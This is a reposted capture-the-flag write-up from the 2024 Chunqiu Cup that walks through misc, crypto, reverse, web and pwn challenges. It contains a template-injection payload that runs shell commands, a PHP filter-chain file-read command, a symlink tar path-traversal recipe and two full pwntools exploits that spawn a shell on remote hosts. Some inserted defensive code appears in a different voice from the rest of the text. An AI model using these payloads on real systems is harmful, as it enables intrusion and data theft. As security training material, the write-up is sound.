2024 Chunqiu Cup Day 1 WP

admin · 2025-02-12 23:07:08

Misc

See anything in these pics?

Brute-force the archive; the password is 5FIVE.

Foremost carves out a black PNG.


Then brute-force the width and height; I used https://github.com/AabyssZG/Deformed-Image-Restorer


Simple disk image extraction

Export all of the files in one click with a certain handy little tool.


This yields a zip; unzip it to get an img. Recover the img with R-Studio to get an xls, and open it for the flag: flag{E7A10C15E26AA5750070EF756AAA1F7C}

Too much pressure, let's write a script

Batch-extract everything directly with the script below.

import zipfile
import os
import base64

current_dir = os.getcwd()
# 990 down to 0: each archive yields the next zip and its base64 password
# (range(990, -1) without the step would be empty and extract nothing)
for i in range(990, -1, -1):
    password_file = os.path.join(current_dir, f"password_{i}.txt")
    zip_file = os.path.join(current_dir, f"zip_{i}.zip")
    with open(password_file, "r") as f:
        encoded_password = f.read().strip()
    password = base64.b64decode(encoded_password).decode("utf-8")
    with zipfile.ZipFile(zip_file) as zf:
        zf.extractall(path=current_dir, pwd=password.encode("utf-8"))

Then concatenate all the txt files, strip the trailing FGFGFG, base64-decode the result, and finally convert the hex to an image to get a QR code.

https://rd.wechat.com/qrcode/confirm?block_type=101&content=flag%7B%5FPASSWORDs%5Fis%5Ffl%40g%21%5F%7D

Simple arithmetic

XOR


Crypto

Are you Little Hash?

SHA-1; just brute-force it. I had GPT write this for me.

4a0a19218e082a343a1b17e5333409af9d98f0f5 => f
07c342be6e560e7f43842e2e21b774e61d85f047 => l
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 => a
54fd1711209fb1c0781092374132c66e79e2241b => g
60ba4b2daa4ed4d070fec06687e249e0e6f9ee45 => {
54fd1711209fb1c0781092374132c66e79e2241b => g
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 => a
6b0d31c0d563223024da45691584643ac78c96e8 => m
58e6b3a414a1e090dfc6029add0f3555ccba127f => e
53a0acfad59379b3e050338bf9f23cfc172ee787 => _
84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 => c
22ea1c649c82946aa6e479e1ffd321e4a318b1b0 => q
e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98 => b
53a0acfad59379b3e050338bf9f23cfc172ee787 => _
042dc4512fa3d391c5170cf3aa61e6a638f84342 => i
a0f1490a20d0211c997b44bc357e1972deab8ae3 => s
042dc4512fa3d391c5170cf3aa61e6a638f84342 => i
a0f1490a20d0211c997b44bc357e1972deab8ae3 => s
53a0acfad59379b3e050338bf9f23cfc172ee787 => _
84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 => c
11f6ad8ec52a2984abaafd7c3b516503785c2072 => x
95cb0bfd2977c761298d9624e4b4d4c72a39974a => y
395df8f7c51f007019cb30201c49e884b46b92fa => z
c2b7df6201fdd3362399091f0a29550df3505b6a => }

flag{game_cqb_isis_cxyz}
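The brute force described above is just a preimage table over single printable characters; the following is an added example (not the author's GPT-written script) that builds that table, selects the algorithm by digest length so it also covers MD5 and SHA-256 chains, and marks digests with no single-character preimage instead of crashing. Function names and the SAMPLE constant are this example's own; SAMPLE holds the first five digests from the chain above.

```python
import hashlib
import string

# Digest length in hex chars -> hashlib constructor. One table per algorithm
# covers the usual CTF chain lengths, not only the SHA-1 case on this page.
ALGOS = {32: hashlib.md5, 40: hashlib.sha1, 64: hashlib.sha256}


def build_table(algo) -> dict[str, str]:
    """Map hex digest -> the single printable character that produced it."""
    return {algo(c.encode()).hexdigest(): c for c in string.printable}


def crack_chain(digests: list[str], unknown: str = "?") -> str:
    """Invert a list of one-character digests into the string they spell.

    A digest whose length matches no known algorithm, or whose preimage is not
    a single printable character, is rendered as `unknown` so the rest of the
    chain still decodes.
    """
    tables: dict[int, dict[str, str]] = {}
    out = []
    for d in digests:
        d = d.strip().lower()
        algo = ALGOS.get(len(d))
        if algo is None:
            out.append(unknown)
            continue
        table = tables.setdefault(len(d), build_table(algo))
        out.append(table.get(d, unknown))
    return "".join(out)


def parse_dump(text: str) -> list[str]:
    """Take the left-hand digest from each 'digest => char' line of the dump."""
    return [line.split("=>")[0].strip()
            for line in text.strip().splitlines() if line.strip()]


# First five entries of the chain quoted in the writeup (SHA-1 of one char each).
SAMPLE = """
4a0a19218e082a343a1b17e5333409af9d98f0f5 => f
07c342be6e560e7f43842e2e21b774e61d85f047 => l
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 => a
54fd1711209fb1c0781092374132c66e79e2241b => g
60ba4b2daa4ed4d070fec06687e249e0e6f9ee45 => {
"""

if __name__ == "__main__":
    print(crack_chain(parse_dump(SAMPLE)))  # flag{
```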

Journey to the hash

ca12fd8250972ec363a16593356abb1f3cf3a16d

Bought at great expense on cmd5.

18876011645

Reverse

Ezgo

Just brute-force it; the final password is oadi. Once the password is correct, the txt inside the zip becomes readable (it sometimes fails, and you have to re-extract and re-enter the password; 2025 apparently works too, which should count as an unintended solution(?)).

Web

file_copy

Just use

https://github.com/synacktiv/php_filter_chains_oracle_exploit

python3 filters_chain_oracle_exploit.py --target url --file '/flag' --parameter path

This only runs on Linux; it errors out on Windows, and the output on Linux comes back slowly.

easy_flask

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /app/flag').read() }}

SSTI injection (I wish the challenge author had stated where the flag is; I couldn't read /flag and it wasn't in env either, which nearly broke me).

Gotar

Tar path traversal

First build a malicious tar from a symlink:

mkdir 1
cd 1
ln -s ../../../.env 2
cd ../
tar -cf 3.tar 1

Upload 3.tar to get the real secret key, as follows:

SfaVqVGfLOKk7Gp912kPe0Li47AEQM4iYNbBx1WVrWA=
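The Gotar bug is an extractor that trusts archive entries, so a symlink named 1/2 pointing at ../../../.env is materialised and later followed out of the upload directory. As an added example (not the challenge's code), the check below is what a server-side extractor should run before unpacking: it rejects member names that leave the destination and link entries whose target resolves outside it, including absolute targets. Function names and the /srv/uploads destination are this example's assumptions; the sample archive is constructed in memory.

```python
import io
import os
import tarfile


def _inside(dest: str, path: str) -> bool:
    """True if `path` (already joined under dest) stays strictly inside dest."""
    dest = os.path.normpath(dest)
    return os.path.normpath(path).startswith(dest + os.sep)


def check_tar_members(data: bytes, dest: str) -> list[str]:
    """Return one reason per unsafe member; an empty list means safe to extract."""
    problems = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf.getmembers():
            target = os.path.join(dest, m.name)
            if not _inside(dest, target):
                # os.path.join discards dest for absolute names, so this also
                # catches "/etc/..." entries, not only "../" ones.
                problems.append(f"{m.name}: path escapes {dest}")
                continue
            if m.issym() or m.islnk():
                # A symlink target resolves relative to the link's own directory;
                # a hard-link target is relative to the archive root.
                base = os.path.dirname(target) if m.issym() else dest
                link = m.linkname if os.path.isabs(m.linkname) \
                    else os.path.join(base, m.linkname)
                if not _inside(dest, link):
                    problems.append(f"{m.name} -> {m.linkname}: link escapes {dest}")
            elif not (m.isfile() or m.isdir()):
                problems.append(f"{m.name}: unsupported member type")
    return problems


def symlink_tar(name: str, linkname: str) -> bytes:
    """Constructed sample: an in-memory tar holding a single symlink entry."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo(name)
        info.type = tarfile.SYMTYPE
        info.linkname = linkname
        tf.addfile(info)
    return buf.getvalue()


if __name__ == "__main__":
    # Mirrors the 3.tar built above: entry 1/2 -> ../../../.env
    print(check_tar_members(symlink_tar("1/2", "../../../.env"), "/srv/uploads"))
```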

The token is a JWT.

Then just stuff it into HackBar and read the flag.

Hacker!!!Is_secret!!! (the so-called jwt_secret)

Pwn

Gender_Simulation

from pwn import *

binary = './pwn'
elf = ELF(binary)
libc = ELF('./libc.so.6')
context.log_level = 'debug'
context.arch = elf.arch
context.terminal = ['tmux', 'neww']

send = lambda data: io.send(data)
send_after = lambda delim, data: io.sendafter(delim, data)
send_line = lambda data: io.sendline(data)
send_line_after = lambda delim, data: io.sendlineafter(delim, data)
recv = lambda num_bytes=4096: io.recv(num_bytes)
recv_until = lambda delims, drop=True: io.recvuntil(delims, drop)
# named unpack32/unpack64 so they don't shadow pwntools' u32/u64 (which would recurse)
unpack32 = lambda data: u32(data.ljust(4, b'\x00'))
unpack64 = lambda data: u64(data.ljust(8, b'\x00'))
interactive = lambda: io.interactive()

io = remote('39.106.48.123', 38698)

# the service leaks the address of setvbuf, which gives the libc base
recv_until(b'A gift: ')
leaked_addr = int(recv_until(b'\n'), 16)
libc_base = leaked_addr - libc.sym.setvbuf
log.info(f"libc_base = {hex(libc_base)}")

recv_until(b'Choose one\n1. Boy\n2. Girl\n')
send_line(b'2')
recv_until(b'2. Tomboy\n')
send_line(b'2')
recv_until(b'certificate\n')

# ROP chain: pop rdi; ret -> "/bin/sh" -> ret (stack alignment) -> system
pop_rdi = libc_base + 0x000000000010f75b
ret_addr = 0x000000000040201a
system_addr = libc.sym.system + libc_base
bin_sh_addr = next(libc.search(b'/bin/sh')) + libc_base
send_line(p64(0x0004025E6))
recv_until(b'If you think you')
send(b'a' * 0x18 + p64(pop_rdi) + p64(bin_sh_addr) + p64(ret_addr) + p64(system_addr))
interactive()

Bypass

from pwn import *
import time
import numpy as np  # needed by the get_qword/get_dword helpers

local_file = './pwn'
elf = ELF(local_file)
libc = ELF('./libc.so.6')
context.log_level = 'debug'
context.arch = elf.arch
context.terminal = ['tmux', 'neww']

send = lambda data: io.send(data)
send_after = lambda delim, data: io.sendafter(delim, data)
send_line = lambda data: io.sendline(data)
send_line_after = lambda delim, data: io.sendlineafter(delim, data)
recv = lambda numb=4096: io.recv(numb)
recv_until = lambda delims, drop=True: io.recvuntil(delims, drop)
unpack32 = lambda data: u32(data.ljust(4, b'\x00'))
unpack64 = lambda data: u64(data.ljust(8, b'\x00'))
get_qword = lambda data: (~np.uint64(data) + 1)
get_dword = lambda data: (~np.uint32(data) + 1)


def get_shell():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))


info_address = lambda tag, addr: io.info(tag + '==>' + ': {:#x}'.format(addr))
interact = lambda: io.interactive()

io = remote('8.147.132.32', 39949)

# leak puts to recover the libc base
send(p8(2) * 4)
recv_until('d')
recv_until('\n')
libc_base = unpack64(recv(6)) - libc.sym.puts
send(p8(0) * 4)

# overwrite the target pointer with a one_gadget address
one_gadget = 0x4f302
send(b'KEY: ' + b'a' * 19 + p8(0x14) + p8(0x2) + b'c' * 8 + p64(one_gadget + libc_base))
time.sleep(0.1)
send(b'VAL: ' + b'b' * 512)
interact()

Team website: https://www.hdsec.cn/

At https://www.hdsec.cn/tools/intranet/intranet.html we have collected a large number of commands used during penetration tests; everyone is welcome to use them.

Originally published on the WeChat official account 黄豆安全实验室: 2024 Chunqiu Cup Day 1 WP

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. For any issues, contact us by e-mail (preferably from a corporate or otherwise valid mailbox to avoid filtering; contact details are on the home page).
Please keep this link when reposting (CN-SEC中文网, with thanks to the original author): https://cn-sec.com/archives/3641891.html